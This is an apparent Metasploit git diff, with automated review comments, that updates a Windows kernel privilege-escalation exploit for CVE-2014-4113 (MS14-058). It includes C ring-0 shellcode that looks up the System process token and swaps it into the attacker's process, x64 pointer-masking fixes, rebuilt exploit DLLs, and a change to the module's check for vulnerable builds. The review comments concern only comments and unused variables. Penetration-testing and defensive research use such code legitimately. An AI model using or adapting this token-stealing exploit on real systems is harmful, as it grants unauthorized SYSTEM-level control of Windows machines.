diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
index 2b83c1358c..24ccff32fc 100755
Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll differ
diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
index e2d5aa76bc..fd71f95119 100755
Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll differ
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
index 1c59213cfe..d81d9d224c 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
 OUT PVOID Process
 );
-typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
 _Inout_ PVOID Process
 );
@@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
 // Search the specified data structure for a member with CurrentValue.
-BOOL FindAndReplaceMember(PDWORD Structure,
+BOOL find_and_replace_member(PDWORD Structure,
 DWORD CurrentValue,
 DWORD NewValue,
 DWORD MaxSize)
@@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure,
 // Microsoft QWORD aligns object pointers, then uses the lower three
 // bits for quick reference counting.
+#ifdef _M_X64
+ Mask = ~0xf;
+#else
 Mask = ~7;
-
+#endif
 // Mask out the reference count.
 CurrentValue &= Mask;
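Review bot: In the `@@ -146,8 +146,11 @@` hunk the comment kept above the new `#ifdef _M_X64` still says the object pointer "uses the lower three bits for quick reference counting", which after this change describes only the 32-bit branch; the x64 branch clears the low four bits (`~0xf`). Reword it so both branches are covered, e.g. `// Object pointers are aligned and the low bits (three on x86, four on x64) hold a quick reference count; mask them out before comparing.` The body of find_and_replace_member continues outside the hunk, so I cannot see the declared type of `Mask`; if it is a 32-bit DWORD, note that `~0xf` and `~7` are int literals that convert to 0xFFFFFFF0 / 0xFFFFFFF8 as intended.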
@@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
 pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
 pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
- TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
- SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);
+ TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
+ SystemToken = pPsReferencePrimaryToken(pSystemInfo);
 // Find the token in the target process, and replace with the system token.
- FindAndReplaceMember((PDWORD)pMyProcessInfo,
+ find_and_replace_member((PDWORD)pMyProcessInfo,
 (DWORD)TargetToken,
 (DWORD)SystemToken,
 0x200);
diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
index 474404f68f..e6a388f10c 100644
--- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
@@ -94,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local
 return Exploit::CheckCode::Safe if build == 9200
 return Exploit::CheckCode::Safe if build == 9600
- if arch == ARCH_X86
- return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
- else
- return Exploit::CheckCode::Detected if build == 7601
- end
+ return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
 return Exploit::CheckCode::Unknown
 end
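Review bot: In the `@@ -94,11 +94,7 @@` hunk of ms14_058_track_popup_menu.rb the removed `if arch == ARCH_X86` branch was the only visible use of `arch` in this method, so `arch` is presumably now an unused local; its assignment lies above the hunk (the `check` method starts outside it), so please confirm and drop it if nothing else reads it. The new single-line form also silently changes the method's contract from "build-and-architecture" to "build only", so a one-line comment above the `return … Detected` stating that the build list is now intentionally architecture-independent, e.g. `# Detection is keyed on build number only; both architectures share the list.`, would keep the next reader from re-adding the branch.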